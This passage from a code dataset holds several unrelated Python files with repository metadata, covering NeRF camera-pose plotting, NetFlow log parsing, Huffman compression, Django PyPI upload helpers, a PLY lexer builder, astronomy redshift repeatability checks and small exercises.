r'$z$')\n\ndef plot_coordinate_system_from_matrix(ax, matrix, scale=1):\n\n R = matrix[0:3,0:3]\n t = matrix[0:3,3]\n\n # get rotated axes\n v1 = np.matmul(R,np.array([-scale,0,0]).transpose())\n v2 = np.matmul(R,np.array([0,-scale,0]).transpose())\n v3 = np.matmul(R,np.array([0,0,-scale]).transpose())\n\n ## Coordinate system axis\n ax.quiver(t[0],t[1],t[2], v1[0], v1[1], v1[2], color=\"r\")\n ax.quiver(t[0],t[1],t[2], v2[0], v2[1], v2[2], color=\"g\")\n ax.quiver(t[0],t[1],t[2], v3[0], v3[1], v3[2], color=\"b\")\n\n\ndef create_3d_axes():\n ax=plt.figure().add_subplot(projection='3d')\n\n # if i dont set these, the plot is all zoomed in\n ax.set_xlim([-1,1])\n ax.set_ylim([-1,1])\n ax.set_zlim([-1,1])\n\n ax.set_xlabel(\"X\")\n ax.set_ylabel(\"Y\")\n ax.set_zlabel(\"Z\")\n ax.view_init(30, 45)\n return ax\n\n\nall_poses = []\nwith open(FILE, 'r') as f:\n file = json.load(f)\n for frame in file['frames']:\n all_poses.append(np.array(frame['transform_matrix']))\n\n\nax = create_3d_axes()\nfor pose in all_poses:\n plot_coordinate_system_from_matrix(ax, pose, 0.3)\n\n\n\n\nplt.ioff()\nplt.show()\n","repo_name":"thangible/NeRF-Segmentation","sub_path":"nerf_data/plot_camera_poses.py","file_name":"plot_camera_poses.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16477641616","text":"# This Python program takes the hours and minutes from the user\n# and return the seconds of the parameters passed.\n\nfrom modules import get_seconds\n\n\ndef run():\n welcome_message = open('messages/welcome.txt', 'r')\n final_result = open('messages/result.txt', 'r')\n print(welcome_message.read())\n\n while True:\n user_decision = input(\"Hit enter to continue or type 'exit' to close the program: \")\n if user_decision.lower() == 'exit':\n print('\\nClosing the program...\\n')\n return\n elif user_decision == '':\n break\n else:\n print('Please enter a valid response')\n\n while True:\n hours = input('\\nEnter the hours: ')\n try:\n hours = int(hours)\n except:\n print('Please enter a number')\n continue\n\n if hours < 0 or hours > 24:\n print('Please enter a valid hour')\n else:\n break\n\n while True: \n minutes = input('\\nEnter the minutes: ')\n try:\n minutes = int(minutes)\n except:\n print('Please enter a number')\n continue\n\n if minutes < 1 or minutes > 59:\n print('Please enter a valid quantity of minutes')\n else:\n break\n\n print(final_result.read().format(hours, minutes, get_seconds(hours, minutes)))\n\n\nif __name__ == '__main__':\n\trun()","repo_name":"PascalSalvador/PlatziCodingChallenge","sub_path":"03-clock/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38780388667","text":"# Nikita Akimov\n# interplanety@interplanety.org\n\n# -------------------------------------------------------------------------------\n# DEBUG variables --- For release all must be = False\n# -------------------------------------------------------------------------------\n\n# show errors\nshow_debug_err = False\n\n# no sending content to server (False - send to server, True - not send)\nno_sending_to_server = False\n\n# write storing to server content to file\nto_server_to_file = False\n\n# write loaded from server content to file\nfrom_server_to_file = 
False\n","repo_name":"Korchy/BIS","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"15674746487","text":"import re\nimport subprocess\nimport socket\nimport struct\nfrom datetime import datetime, timedelta\nimport config\n\n\"\"\"\nNetflow dump output format\n %ts Start Time - first seen\n %te End Time - last seen\n %td Duration\n %pr Protocol\n %sa Source Address\n %da Destination Address\n %sap Source Address:Port\n %dap Destination Address:Port\n %sp Source Port\n %dp Destination Port\n %sas Source AS\n %das Destination AS\n %in Input Interface num\n %out Output Interface num\n %pkt Packets\n %byt Bytes\n %fl Flows\n %pkt Packets\n %flg TCP Flags\n %tos Tos\n %bps bps - bits per second\n %pps pps - packets per second\n %bpp bps - Bytes per package\n\"\"\"\n\n# Usage: \nclass NetFlow(object):\n\n re_ipv4 = \"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.\" \\\n \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.\" \\\n \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.\" \\\n \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$\"\n\n def __init__(self):\n pass\n\n def readLog(self, start_datetime, end_datetime, log_interval, \n options=[], file_name=\"\", mode=\"csv\"):\n end_datetime -= timedelta(minutes=log_interval)\n start_date = datetime.strftime(start_datetime.date(), \"%Y-%m-%d\")\n end_date = datetime.strftime(end_datetime.date(), \"%Y-%m-%d\")\n start_datetime = datetime.strftime(start_datetime, \"%Y%m%d%H%M\")\n end_datetime = datetime.strftime(end_datetime, \"%Y%m%d%H%M\")\n log_path = \"%s%s/nfcapd.%s:%s/nfcapd.%s\" % (config.nfs_dir, \\\n start_date, start_datetime, end_date, end_datetime)\n args = ['nfdump', '-R', log_path]\n # options\n args.extend(options)\n # mode\n args.extend([\"-o\", mode])\n\n if file_name == \"\":\n p = subprocess.Popen(args,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n return out\n else:\n file_handle = open(file_name, \"w\")\n p = subprocess.Popen(args,\n stdout=file_handle)\n ret_code = p.wait()\n file_handle.flush()\n file_handle.close()\n return \"\"\n\n def readDayLog(self, day, options=[], mode=\"\"):\n day = datetime.strftime(day.date(), \"%Y-%m-%d\")\n log_path = \"%s%s\" % (config.nfs_dir, day)\n args = ['nfdump', '-R', log_path]\n # options\n args.extend(options)\n # mode\n args.extend([\"-o\", mode])\n p = subprocess.Popen(args,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n return out\n\n def parseLogLine(self, plain=\"\", mode=\"csv\"):\n if mode == 'csv':\n log = plain.split(\"\\n\")\n # if we use -a and -L, remove the first line\n # \"Byte limit: > 2000 bytes\"\n if \"limit\" in log[0]:\n log.pop(0)\n head = log[0].split(',')\n\n for line in log[1:-4]:\n if \",\" not in line:\n break\n yield dict(zip(head, line.split(',')))\n\n elif mode == 'pipe':\n head = [\n 'af', # Address Family\n 'tfs', # Time First Seen\n 'mfs', # msec First Seen\n 'tls', # Time First Seen\n 'mls', # msec First Seen\n 'pr', # Protocol\n 'sa', # Source Address\n 'sp', # Source Port\n 'da', # Destination Address\n 'dp', # Destination Port\n 'sas', # Source AS Number\n 'das', # Destination AS Number\n 'in', # Input Interface\n 'out', # Output Interface\n 'flg', # TCP Flag\n 'tos', # Type of Service\n 'pkt', # Packet\n 'byt' # Byte\n ]\n\n for line in plain.split('\\n')[:-5]:\n data = line.split('|')\n if data[0] == '2':\n # IPv4\n data[11:15] = [socket.inet_ntoa(struct.pack('!L', 
\\\n int(data[14])))]\n data[6:10] = [socket.inet_ntoa(struct.pack('!L', \\\n int(data[9])))]\n elif data[0] == '10':\n # IPv6\n data[11:15] = [socket.inet_ntop(socket.AF_INET6,\n struct.pack('!LLLL', \\\n *(long(i) for i in \\\n data[11:15])))]\n data[6:10] = [socket.inet_ntop(socket.AF_INET6,\n struct.pack('!LLLL', \\\n *(long(i) for i in \\\n data[6:10])))]\n else:\n # Unknown\n data[11:15] = [ \"\".join(data[11:15]) ]\n data[6:10] = [ \"\".join(data[6:10]) ]\n\n yield dict(zip(head, data))\n else:\n head = [i.replace(\"%\",\"\") for i in mode.split(\":\")[1].split(\",\")]\n log = plain.split(\"\\n\")\n\n for line in log:\n if \"Summary\" in line:\n break\n elif \",\" in line:\n body = [i.strip() for i in line.split(',')]\n yield dict(zip(head, body))\n\n def parseSummary(self, plain=\"\", mode=\"csv\"):\n log = plain.split(\"\\n\")\n if mode == 'csv':\n head = log[-3].split(',')\n return dict(zip(head, log[-2].split(',')))\n else:\n head = [\"flows\",\"bytes\",\"packets\"]\n pattern = \"Summary: total flows: ([\\d]+), total bytes: ([\\d]+),\" \\\n \" total packets: ([\\d]+)\"\n result = list(re.findall(pattern, plain)[0])\n return dict(zip(head, result))\n\n def checkIPv4(self, ip=None):\n if ip is not None:\n return re.match(self.re_ipv4, ip)\n","repo_name":"spot5418/CDS","sub_path":"source code/nflow.py","file_name":"nflow.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38780377907","text":"# Nikita Akimov\n# interplanety@interplanety.org\n#\n# GitHub\n# https://github.com/Korchy/BIS\n\n# attribute class\n\n# now newer used, can be used for more logic between node.py and bl_types.py\n\nfrom .bl_types import BlTypes\n\n\nclass Attribute:\n\n @classmethod\n def to_json(cls, attribute, attribute_name):\n attribute_json = {}\n if isinstance(attribute, (int, float, bool, set, str)):\n # attribute = attribute_json\n attribute_json[attribute_name] = attribute\n else:\n print('complex attr', attribute_name, attribute)\n return attribute_json\n\n @classmethod\n def from_json(cls, attribute_name, attribute_owner, attribute_json, attachments_path):\n # fill attribute from json\n if isinstance(getattr(attribute_owner, attribute_name), (int, float, bool, set, str)):\n attribute = attribute_json\n else:\n attribute = BlTypes.from_json(\n instance_name=attribute_name,\n instance_owner=attribute_owner,\n instance_json=attribute_json['instance'][attribute_name],\n attachments_path=attachments_path\n )\n return attribute\n","repo_name":"Korchy/BIS","sub_path":"attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"1276239040","text":"from .huffman import HuffmanCoding\r\nimport sys\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tpath = \"data.txt\"\r\n\r\n\twith open(path, 'r') as f:\r\n\t\tlines = f.readlines()\r\n\t\tlines = lines[0].strip('\\n').split(' ')\r\n\t\tlines = [int(n) for n in lines]\r\n\r\n\r\n\tprint(len(lines))\r\n\r\n\t# new_file = open(\"data_bin.bin\", \"wb\")\r\n\t# arr = bytearray(lines)\r\n\t# new_file.write(arr)\r\n\r\n\th = HuffmanCoding(path)\r\n\r\n\toutput_path = h.compress()\r\n\tprint(\"Compressed file path: \" + output_path)\r\n\r\n\tdecom_path = h.decompress(output_path)\r\n\tprint(\"Decompressed file path: \" + 
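parseLogLine above decodes nfdump's pipe format, where IPv4 addresses arrive as unsigned 32-bit integers. The conversion idiom in isolation, standard library only (the sample value is made up):

import socket
import struct

def int_to_ipv4(n: int) -> str:
    # pack the integer big-endian ('!L'), then render it as a dotted quad
    return socket.inet_ntoa(struct.pack('!L', n))

assert int_to_ipv4(3232235777) == '192.168.1.1'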
decom_path)","repo_name":"unik00/progressive_image_compression","sub_path":"huffman/useHuffman.py","file_name":"useHuffman.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3517686920","text":"from datetime import datetime\n\ndef es_dia_semana(fecha):\n # Get the weekday number: Monday = 0, Tuesday = 1, etc.\n dia = fecha.weekday()\n\n if dia < 5:\n return True\n else:\n return False\n\nif es_dia_semana(datetime.now()):\n print(\"Es día de semana... ¡A trabajar!\")\nelse:\n print(\"¡Es fin de semana! ¡Joda!\")\n\n","repo_name":"agustincomolli/Python","sub_path":"Programación 102 - Piense como un informático/04_funciones_parametros.py","file_name":"04_funciones_parametros.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74806570988","text":"from django.http import HttpResponse\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.utils.datastructures import MultiValueDict\nfrom django.contrib.auth import authenticate\n\n\nclass HttpResponseNotImplemented(HttpResponse):\n status_code = 501\n\n\nclass HttpResponseUnauthorized(HttpResponse):\n status_code = 401\n\n def __init__(self, realm):\n HttpResponse.__init__(self)\n self['WWW-Authenticate'] = 'Basic realm=\"%s\"' % realm\n\n\ndef parse_distutils_request(request):\n raw_post_data = request.raw_post_data\n sep = raw_post_data.splitlines()[1]\n items = raw_post_data.split(sep)\n post_data = {}\n files = {}\n for part in filter(lambda e: not e.isspace(), items):\n item = part.splitlines()\n if len(item) < 2:\n continue\n header = item[1].replace(\"Content-Disposition: form-data; \", \"\")\n kvpairs = header.split(\";\")\n headers = {}\n for kvpair in kvpairs:\n if not kvpair:\n continue\n key, value = kvpair.split(\"=\")\n headers[key] = value.strip('\"')\n if \"name\" not in headers:\n continue\n content = part[len(\"\\n\".join(item[0:2]))+2:len(part)-1]\n if \"filename\" in headers:\n file = SimpleUploadedFile(headers[\"filename\"], content,\n content_type=\"application/gzip\")\n files[\"distribution\"] = [file]\n elif headers[\"name\"] in post_data:\n post_data[headers[\"name\"]].append(content)\n else:\n # Distutils sends UNKNOWN for empty fields (e.g platform)\n # [russell.sim@gmail.com]\n if content == 'UNKNOWN':\n post_data[headers[\"name\"]] = [None]\n else:\n post_data[headers[\"name\"]] = [content]\n\n return MultiValueDict(post_data), MultiValueDict(files)\n\n\ndef login_basic_auth(request):\n authentication = request.META.get(\"HTTP_AUTHORIZATION\")\n if not authentication:\n return\n (authmeth, auth) = authentication.split(' ', 1)\n if authmeth.lower() != \"basic\":\n return\n auth = auth.strip().decode(\"base64\")\n username, password = auth.split(\":\", 1)\n return authenticate(username=username, password=password)\n","repo_name":"ask/chishop","sub_path":"djangopypi/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"37"} +{"seq_id":"1276239040","text":"\"\"\"plySimpleLex.py: class that gathers all the information coming from PLY-SIMPLE::LEX\"\"\"\n\nimport sys\n\n## lex keys\ntokens_key = \"tokens\"\ndefinedToken_key = \"alreadyDefined\"\nliterals_key = \"literals\"\nignore_key = \"ignore\"\nerror_key = \"error\"\nreturn_key = \"return\"\nregex_key = 
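es_dia_semana depends only on datetime.weekday(), so fixed dates pin its behavior down. A compact equivalent with two checks (the dates are chosen arbitrarily):

from datetime import datetime

def es_dia_semana(fecha):
    # Monday..Friday map to 0..4
    return fecha.weekday() < 5

assert es_dia_semana(datetime(2023, 11, 6))      # a Monday
assert not es_dia_semana(datetime(2023, 11, 4))  # a Saturday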
\"regex\"\nstates_key = \"states\"\n\n## common keys\nlineno_key = \"lineno\"\ncomment_key = \"comment\"\nid_key = \"id\"\npython_key = \"pythonCode\"\n\nclass PlySLexObject:\n\n def __init__(my):\n \n my._idCounter = 1 ## statement id\n\n my._hasLiterals = False ## flag control for literals definition\n my._hasTokens = False ## flag control for tokens definition\n my._hasIgnore = False ## flag control for ignore definition\n my._hasError = False\n my._hasStates = False\n\n my._literals = {}\n my._tokens = {}\n my._ignore = {}\n my._error = {}\n my._returns = []\n my._states = {}\n my._comments = []\n\n my._pythonCode = []\n my._keysOrder = []\n\n def reset(my):\n my._idCounter = 1 ## statement id\n my._hasLiterals = False ## flag control for literals definition\n my._hasTokens = False ## flag control for tokens definition\n my._hasIgnore = False ## flag control for ignore definition\n my._hasError = False\n my._hasStates = False\n my._literals = {}\n my._tokens = {}\n my._ignore = {}\n my._error = {}\n my._returns = []\n my._states = {}\n my._comments = []\n my._pythonCode = []\n my._keysOrder = []\n ##--------------------------------------------------\n ##----------------- Variables gets/sets/deleters ---\n ##--------------------------------------------------\n \n ## literals\n @property\n def literals(my):\n return my._literals\n \n @literals.setter\n def literals(my, value):\n my._literals = value\n \n @literals.deleter\n def literals(my):\n del my._literals\n\n ## varsFullyDefined\n @property\n def varsFullyDefined(my):\n return my._varsFullyDefined\n \n @varsFullyDefined.setter\n def varsFullyDefined(my, value):\n my._varsFullyDefined = value\n \n @varsFullyDefined.deleter\n def varsFullyDefined(my):\n del my._varsFullyDefined\n\n\n ## hasError\n @property\n def hasError(my):\n return my._hasError\n \n @hasError.setter\n def hasError(my, value):\n my._hasError = value\n \n @hasError.deleter\n def hasError(my):\n del my._hasError\n\n ## hasIgnore\n @property\n def hasIgnore(my):\n return my._hasIgnore\n \n @hasIgnore.setter\n def hasIgnore(my, value):\n my._hasIgnore = value\n \n @hasIgnore.deleter\n def hasIgnore(my):\n del my._hasIgnore\n\n\n ## hasTokens\n @property\n def hasTokens(my):\n return my._hasTokens\n \n @hasTokens.setter\n def hasTokens(my, value):\n my._hasTokens = value\n \n @hasTokens.deleter\n def hasTokens(my):\n del my._hasTokens\n\n\n ## hasLiterals\n @property\n def hasLiterals(my):\n return my._hasLiterals\n \n @hasLiterals.setter\n def hasLiterals(my, value):\n my._hasLiterals = value\n \n @hasLiterals.deleter\n def hasLiterals(my):\n del my._hasLiterals\n\n ## idCounter\n @property\n def idCounter(my):\n return my._idCounter\n \n @idCounter.setter\n def idCounter(my, value):\n my._idCounter = value\n \n @idCounter.deleter\n def idCounter(my):\n del my._idCounter\n \n \"\"\"Increment the object's current statement ID\"\"\"\n def idCounter_inc(my):\n my._idCounter = my._idCounter + 1\n\n ## literals\n @property\n def literals(my):\n return my._literals\n\n @literals.setter\n def literals(my, value):\n my._literals = value\n\n @literals.deleter\n def literals(my):\n del my._literals\n\n\n ## tokens\n @property\n def tokens(my):\n return my._tokens\n\n @tokens.setter\n def tokens(my, value):\n my._tokens = value\n\n @tokens.deleter\n def tokens(my):\n del my._tokens\n\n\n ##--------------------------------------------------\n ##----------------- PLYSIMPLELEX FUNCTIONS ---------\n ##--------------------------------------------------\n\n \"\"\"Add the 
literals\"\"\"\n def addLiterals(my, lit):\n\n line = lit[lineno_key]\n\n if literals_key in lit.keys():\n\n if my._hasLiterals is False:\n lit[id_key] = my._idCounter\n my.idCounter_inc()\n my._hasLiterals = True\n my._literals = lit\n else :\n sys.exit(\"\\n#> duplicate reference of \\'literals\\' lineno: \" + str(line))\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'literals\\' statement! lineno: \" + str(line))\n\n \"\"\"Add the tokens\"\"\"\n def addTokens(my, tokens):\n\n if tokens_key in tokens.keys():\n\n if my._hasTokens is False:\n #tks = {p[2] : p[5], lineno_key : my._tokenizer.lexer.lineno, comment_key : p[8]}\n # extra field that records, for each token, whether it has already been defined\n tokens[definedToken_key] = {}\n eachToken = tokens[definedToken_key]\n for s in tokens[tokens_key]:\n eachToken[s] = False\n tokens[id_key] = my._idCounter\n my.idCounter_inc()\n my._tokens = tokens\n my._hasTokens = True\n\n else :\n sys.exit(\"\\n#> duplicate reference of \\'tokens\\'\")\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'tokens\\' statement!\")\n\n \"\"\"Add a token definition\"\"\"\n def addTokenDefinition(my, variable):\n\n # if it is a return value\n if return_key in variable.keys():\n \n # get the variable to return\n varToReturn = variable[return_key]\n # if it is being specified BEFORE being defined - error\n if my._hasTokens is False:\n # the tokens have not been defined yet\n sys.exit(\"\"\"\\n#> unknown reference to \\'{}\\'\n Have you defined token's list?\"\"\".format(varToReturn))\n\n # if it is being specified AFTER being defined\n else:\n \n # get the dictionary of variables added in %tokens =\n varsDict = my._tokens[definedToken_key]\n # if the variable being specified was already complete - error\n if varsDict[varToReturn] is True:\n sys.exit(\"\\n#> error! duplicate reference to \\'{}'s definition/return value\".format(varToReturn))\n # if this is the first time it is being specified, update and add\n else:\n state = variable[states_key]\n if state is not None and state != \"ANY\":\n validState = False\n states = my._states[states_key]\n for st in states:\n s = (st[0])[1:-1]\n if state == s:\n validState = True\n break\n if validState is False:\n sys.exit(\"\\n#> error! 
unknown reference to state : \" + str(state) + \", lineno: \" + str(variable[lineno_key]))\n\n variable[id_key] = my._idCounter\n my.idCounter_inc()\n my._returns.append(variable)\n varsDict[varToReturn] = True\n\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'return\\' specification!\")\n \n \"\"\"Add ignore\"\"\"\n def addIgnore(my, ignore):\n \n if ignore_key in ignore.keys():\n\n if my._hasIgnore is True:\n sys.exit(\"\\n#> duplicate reference to \\'ignore\\' statement\")\n else:\n ignore[id_key] = my._idCounter\n my.idCounter_inc()\n my._ignore = ignore\n my._hasIgnore = True\n else:\n sys.exit(\"\\n#> what you tried to add is not an \\'ignore\\' statement!\") \n \n \"\"\"Add error\"\"\"\n def addError(my, error):\n \n if error_key in error.keys():\n\n if my._hasError is True:\n sys.exit(\"\\n#> duplicate reference to \\'error\\' statement\")\n else:\n error[id_key] = my._idCounter\n my.idCounter_inc()\n my._error = error\n my._hasError = True\n else:\n sys.exit(\"\\n#> what you tried to add is not an \\'error\\' statement!\")\n\n \"\"\"Add states\"\"\"\n def addStates(my, states):\n\n if states_key in states.keys():\n\n if my._hasStates is True:\n sys.exit(\"\\n#> duplicate reference to \\'state\\' statement\")\n\n else:\n states[id_key] = my._idCounter\n my.idCounter_inc()\n my._states = states\n my._hasStates = True\n else:\n sys.exit(\"\\n#> what you tried to add is not a \\'state\\' statement\")\n \n \"\"\"Add comments\"\"\"\n def addComment(my, comment):\n\n comment[id_key] = my._idCounter\n my.idCounter_inc()\n my._comments.append(comment)\n\n \"\"\"Add Python code\"\"\"\n def addPythonCode(my, python):\n python[id_key] = my._idCounter\n my.idCounter_inc()\n my._pythonCode.append(python)\n\n \"\"\"Add the found statement to the correct list\"\"\"\n def addStatement(my, statement):\n\n ## TOKENS KEY\n if tokens_key in statement.keys():\n my.addTokens(statement)\n my._keysOrder.append(tokens_key)\n\n ## RETURN KEY\n elif return_key in statement.keys():\n my.addTokenDefinition(statement)\n my._keysOrder.append(return_key)\n \n ## LITERALS KEY\n elif literals_key in statement.keys():\n my.addLiterals(statement)\n my._keysOrder.append(literals_key)\n \n ## IGNORE KEY\n elif ignore_key in statement.keys():\n my.addIgnore(statement)\n my._keysOrder.append(ignore_key)\n \n ## ERROR KEY\n elif error_key in statement.keys():\n my.addError(statement)\n my._keysOrder.append(error_key)\n \n ## STATE KEY\n elif states_key in statement.keys():\n my.addStates(statement)\n my._keysOrder.append(states_key)\n\n ## COMMENT KEY\n elif comment_key in statement.keys():\n my.addComment(statement)\n my._keysOrder.append(comment_key)\n\n ## PYTHON KEY\n elif python_key in statement.keys():\n my.addPythonCode(statement)\n my._keysOrder.append(python_key)\n\n ## UNKNOWN KEY - ERROR\n else:\n sys.exit(\"\\n#> error: unknown statement!! lineno: \" + str(statement[lineno_key]))\n\n\n \n \"\"\"Check whether the plySimple LEX is complete and can proceed to the YACC configuration\"\"\"\n def isReady(my):\n\n if my._hasTokens is False: \n sys.exit(\"PlySimple-error: tokens are missing!\")\n # needs to terminate!\n \n elif my._hasIgnore is False:\n print(\"#> Warning: ignore characters are missing!\")\n # does not need to terminate! 
\n\n if my._hasError is False:\n print(\"#> Warning: error rule is missing!\") \n # does not need to terminate!\n \n varsDict = my._tokens[definedToken_key]\n for variable in varsDict:\n if varsDict[variable] is False:\n sys.exit(\"PlySimple-error: rule definition for variable \\\"\" + variable + \"\\\" is missing!\")\n # needs to terminate!\n return True \n\n\n \"\"\"Print the variables already stored in the class\"\"\"\n def printVariables(my):\n\n for v in vars(my):\n print(v, \"-> \", vars(my)[v])\n \n\n\n \n","repo_name":"DMdSA/PL-Projetos","sub_path":"TP02/src/plySimple/plySimpleLex.py","file_name":"plySimpleLex.py","file_ext":"py","file_size_in_byte":12362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6374023071","text":"import pyfits\nimport glob\nimport numpy as N\nimport pylab as P\nimport os\nimport shutil\nimport sys\n\nclass Repeatability:\n\n directory = '/uufs/astro.utah.edu/common/home/u0814744/compute/scratch/repeatability'\n\n @staticmethod\n def makeSpAllRepeats():\n\n hdu = pyfits.open('/uufs/chpc.utah.edu/common/home/sdss02/ebosswork/eboss/spectro/redux/test/bautista/test_dr14/spAll-test_dr14.fits')\n\n print('Selecting LRGs')\n a = hdu[1].data\n w = N.where( a.EBOSS_TARGET1 & 2 > 0)[0]\n a = a[w]\n\n\n wr = list()\n\n for i in range(len(a)):\n sys.stderr.write('\\r '+str(i)+' '+str(len(a)))\n t = a.THING_ID[i]\n w = N.where( a.THING_ID == t )[0]\n if len(w) > 1:\n wr.extend(w)\n print(len(wr))\n\n wr = N.unique(N.array(wr))\n newa = a[wr]\n print(len(N.unique( newa.THING_ID )), 'repeats')\n newhdu = pyfits.BinTableHDU(data=newa)\n newhdu.writeto(Repeatability.directory+'/spAll-v5_10_0-repeats_lrg.fits')\n\n @staticmethod\n def getDeltaVexistent():\n\n a = pyfits.open(Repeatability.directory+'/spAll-v5_10_0-repeats_lrg.fits')[1].data\n\n data = N.empty( 0, dtype= [ ('thing_id', int), ('dv', float), ('z1', float), \\\n ('z2', float), ('dc1', float), ('dc2', float), \\\n ('dc_min', float)])\n for i in range(len(a)):\n t = a.THING_ID[i]\n if t in data['thing_id']:\n continue\n w = N.where( a.THING_ID == t)[0]\n if a.RCHI2DIFF_NOQSO[w[0]] < a.RCHI2DIFF_NOQSO[w[1]]:\n j1 = w[1]\n j2 = w[0]\n else:\n j1 = w[0]\n j2 = w[1]\n\n z1 = a.Z_NOQSO[j1]\n z2 = a.Z_NOQSO[j2]\n dc1 = a.RCHI2DIFF_NOQSO[j1]\n dc2 = a.RCHI2DIFF_NOQSO[j2]\n\n c_kms = 299792.458\n dv = abs(z1-z2)*c_kms/(1+min([z1, z2]))\n dc_min = min([dc1, dc2])\n\n data = N.append(data, N.array( (t, dv, z1, z2, dc1, dc2, dc_min), dtype=data.dtype))\n\n return data\n\n @staticmethod\n def getDeltaVsplits(guy=0):\n\n dir = '/uufs/chpc.utah.edu/common/home/sdss02/ebosswork/eboss/spectro/redux/test/bautista'\n if guy:\n a = pyfits.open(dir+'/v5_8_guy_split1/spAll-v5_8_guy_split1.fits')[1].data\n b = pyfits.open(dir+'/v5_8_guy_split2/spAll-v5_8_guy_split2.fits')[1].data\n else:\n a = pyfits.open(dir+'/split1/spAll-split1.fits')[1].data\n b = pyfits.open(dir+'/split2/spAll-split2.fits')[1].data\n\n w = N.where( a.EBOSS_TARGET1 & 2 > 0)[0]\n ngals = len(w)\n a = a[w]\n b = b[w]\n\n data = N.empty( 0, dtype= [ ('thing_id', int), ('dv', float), ('z1', float), \\\n ('z2', float), ('dc1', float), ('dc2', float), \\\n ('dc_min', float)])\n for i in range(ngals):\n t = a.THING_ID[i]\n if b.THING_ID[i] != t:\n print('Mismatch in thing_id!', t, b.THING_ID[i])\n\n if a.RCHI2DIFF_NOQSO[i] < b.RCHI2DIFF_NOQSO[i]:\n z1 = b.Z_NOQSO[i]\n z2 = a.Z_NOQSO[i]\n dc1 = b.RCHI2DIFF_NOQSO[i]\n dc2 = a.RCHI2DIFF_NOQSO[i]\n else:\n z1 = a.Z_NOQSO[i]\n z2 = b.Z_NOQSO[i]\n dc1 = 
a.RCHI2DIFF_NOQSO[i]\n dc2 = b.RCHI2DIFF_NOQSO[i]\n\n c_kms = 299792.458\n dv = abs(z1-z2)*c_kms/(1+ min([z1, z2]))\n dc_min = min([dc1, dc2])\n\n data = N.append(data, N.array( (t, dv, z1, z2, dc1, dc2, dc_min), dtype=data.dtype))\n\n\n return data\n\n @staticmethod\n def getRepeatsData():\n data1 = Repeatability.getDeltaVexistent()\n data2 = Repeatability.getDeltaVsplits()\n data = N.append(data1, data2)\n return data\n\n @staticmethod\n def makeComp(save=0):\n\n data = Repeatability.getRepeatsData()\n\n dc = data['dc_min']\n dv = data['dv']\n\n P.figure()\n P.plot( dc, dv, 'k.', alpha=0.4)\n P.ylim(0.1, 1e6)\n P.xlim(1e-6, 1)\n P.xscale('log')\n P.yscale('log')\n ylim = P.ylim()\n P.plot( [1e-2, 1e-2], ylim, 'b--', lw=2)\n P.plot( [5e-3, 5e-3], ylim, 'r--', lw=2)\n P.plot( [1e-6, 1], [1000, 1000], 'm--', lw=2)\n P.xlabel(r'$\\Delta \\chi^2/dof$')\n P.ylabel(r'$\\Delta v$ (km/s)')\n P.tight_layout()\n if save:\n P.savefig(Repeatability.directory+'/plots/Repeat_all_rchi2_vel.pdf',\\\n bbox_inches='tight')\n\n ngals = len(dv)*1.\n print('Total galaxies in plot', ngals)\n print(' dchi2 < 0.01', N.sum( dc< 0.01), N.sum( dc< 0.01)/ngals)\n print(' dchi2 < 0.005', N.sum( dc< 0.005), N.sum( dc< 0.005)/ngals)\n print(' dv > 1000 km/s', N.sum( dv > 1000.), N.sum( dv > 1000.)/ngals)\n\n return data\n\n\n\n","repo_name":"timahutchinson/redmonster","sub_path":"python/redmonster/sandbox/RepeatsPlot.py","file_name":"RepeatsPlot.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"22968245869","text":"adatok = []\natlag = []\n\nforras = open(\"sebesseg.txt\")\n\nfor sor in forras:\n sor = sor.strip().split()\n sor = list(map(int, sor))\n adatok.append(sor)\nprint(adatok)\n\n# How many cars' data were recorded?\nprint(len(adatok),\" autó adatát rögzítették.\")\n\nfor i in adatok:\n v_atlag = round(sum(i)/len(i),2)\n atlag.append(v_atlag)\n\nprint(atlag)\n# The car with the highest average speed\nmax_atlag = max(atlag)\nprint(\"A(z)\", str(atlag.index(max_atlag)+1),\". autó átlagsebessége volt a legnagyobb: \", max_atlag)\n\nfor i in range(len(atlag)):\n print(\"Az\", i+1, \". autó legnagyobb sebessége\", atlag[i], \"km/h\")\n\nforras.close()\n\ncel = open(\"atlagsebesseg.txt\", \"w\")\n\nfor i in range(len(atlag)):\n cel.write(str(i+1) + \" \" + str(atlag[i]) + \"\\n\")\ncel.write(\"\\n2023\\n\")\ncel.close()","repo_name":"peterteszary/Vasvari-Code-Repository-For-Study-Purposes","sub_path":"Python 